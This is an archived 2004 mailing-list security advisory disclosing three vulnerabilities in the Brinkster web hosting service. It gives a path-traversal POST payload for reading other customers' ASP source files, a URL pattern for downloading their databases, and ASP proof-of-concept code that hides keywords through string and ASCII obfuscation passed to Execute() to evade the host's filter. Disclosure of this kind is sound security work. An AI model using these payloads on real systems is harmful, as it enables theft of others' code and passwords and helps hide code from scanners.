[VulnWatch] Brinskter Multiple Vulnerabilities

From: Ferruh Mavituna (ferruh@private)
Date: Sun Feb 08 2004 - 13:10:10 PST

Next message: Paul Starzetz: "[VulnWatch] Second critical mremap() bug found in all Linux kernels"

Previous message: Peter Winter-Smith: "[VulnWatch] The Palace 3.x (Client) Stack Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- ------------------------------------------------------
BRINSKTER MULTIPLE VULNERABILITIES
- ------------------------------------------------------
Online URL : http://ferruh.mavituna.com/?435

1. Retrieving other users ASP Source Codes
Severity: Highly Critical

2. Accessing Database Files
Severity: Medium Critical

3. Skipping Brinkster Code Controls
Severity: Low Critical


- ------------------------------------------------------
ABOUT BRINKSTER;
- ------------------------------------------------------
Brinkster is a popular free and paid Windows based web hosting
company with many customers 
www.brinskter.com

- ------------------------------------------------------
VULNURABLE;
- ------------------------------------------------------
Currently (1/26/2004) Brinskter.com is vulnerable;

- ------------------------------------------------------
1.RETRIEVING OTHER USERS ASP SOURCE CODES
- ------------------------------------------------------
Any valid user can access other users source codes just by know file
names. So an attacker can access ASP Source Codes, database passwords
and other information in source codes.

This problem is related with Brinkster File Manager
(http://www.brinkster.com/FileManager.asp). File Manager Edit page
(http://www.brinkster.com/FileManagerEdit.asp) allows an attacker to
access other user's files by modifying POST requests.

	------------------------------------------------------
	URL	: http://www.brinkster.com/FileManagerEdit.asp
	POST	: faction=editfile&file2edit=%5C..%5C[VICTIM
USERNAME]%5C[FILE
TO READ AS TEXT]
	------------------------------------------------------

- ------------------------------------------------------
2. ACCESSING DATABASE FILES
- ------------------------------------------------------
If you know the name of any Brinkster user database file you can
download it. (You can find database name form source code -see:first
vuln.-). 

	------------------------------------------------------
	Database URL;

http://[BrinksterServer].brinkster.com/[Username]/db/[DatabaseFileName
]
	------------------------------------------------------


- ------------------------------------------------------
3. SKIPPING CODE CONTROLS
- ------------------------------------------------------
Brinkster does not allow some code snippets in ASP files for server
performance. Like "Server.Scripttimeout = 8000". Brinkster File
Manager automatically scanning your uploaded source code and if it
find any restricted keyword, it will delete your uploaded file.

You can skip this by using ASP built-in Execute() function. This
function is not in Brinkster keyword blacklist. So write a simple
decoder and encoder for your code and use it by Execute() function.


	------------------------------------------------------
	Proof of Concept;
	------------------------------------------------------	
	1) Simple Method without Execute();
	<%
	 On _
	 Error Resume Next
	%>

	2) Another Method with Execute();
	<%
	Dim onErrorStr
	onErrorStr = "S e r v e r.S c r i p t T i m e o u t-E r r o r-R e s
u m e-N e x t"
	Execute(Replace(Replace(onErrorStr," ",""),"-"," "))
	%>


	3) Another one with a Ascii values and Execute();
	This code allows you set "Server.Scripttimeout";
	<%
	Dim converted
	Const errStr =
"083101114118101114046083099114105112116084105109101111117116032061032
057048048048048048048048048 "
		converted = Asc2Str(errStr)
		Execute(converted)

		Response.Write converted	

		Function Asc2Str(byVal text)
			Dim converted, character, i
			For i = 0 to Round((Len(text)-1)/3,0)
				If Len(text) > 2 Then
					character = Chr(Left(text,3))
					converted = converted & character
					text = Right(text,Len(text)-3)
				End If
			Next

			Asc2Str = converted
		End Function
	%>
	------------------------------------------------------
	// -- 
	------------------------------------------------------



- ------------------------------------------------------
HISTORY;
- ------------------------------------------------------
01.01.2004 - Discovered
01.18.2004 - Vendor Informed
02.08.2004 - Published

- ------------------------------------------------------
Vendor Status;
- ------------------------------------------------------
2 e-mails, any answer.


Ferruh Mavituna
Web Application Security Specialist
http://ferruh.mavituna.com

-----BEGIN PGP SIGNATURE-----
Version: PGP 8.0.3

iQA/AwUBQCaloDL0QoVzo2STEQLb/ACggW0TpBAbt4q+g+ejzLJ68PhGK9gAnA8L
d4nBCqCN6a2YpLYyycS1klqd
=jBvy
-----END PGP SIGNATURE-----

Next message: Paul Starzetz: "[VulnWatch] Second critical mremap() bug found in all Linux kernels"
Previous message: Peter Winter-Smith: "[VulnWatch] The Palace 3.x (Client) Stack Overflow Vulnerability"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Mon Feb 09 2004 - 14:32:13 PST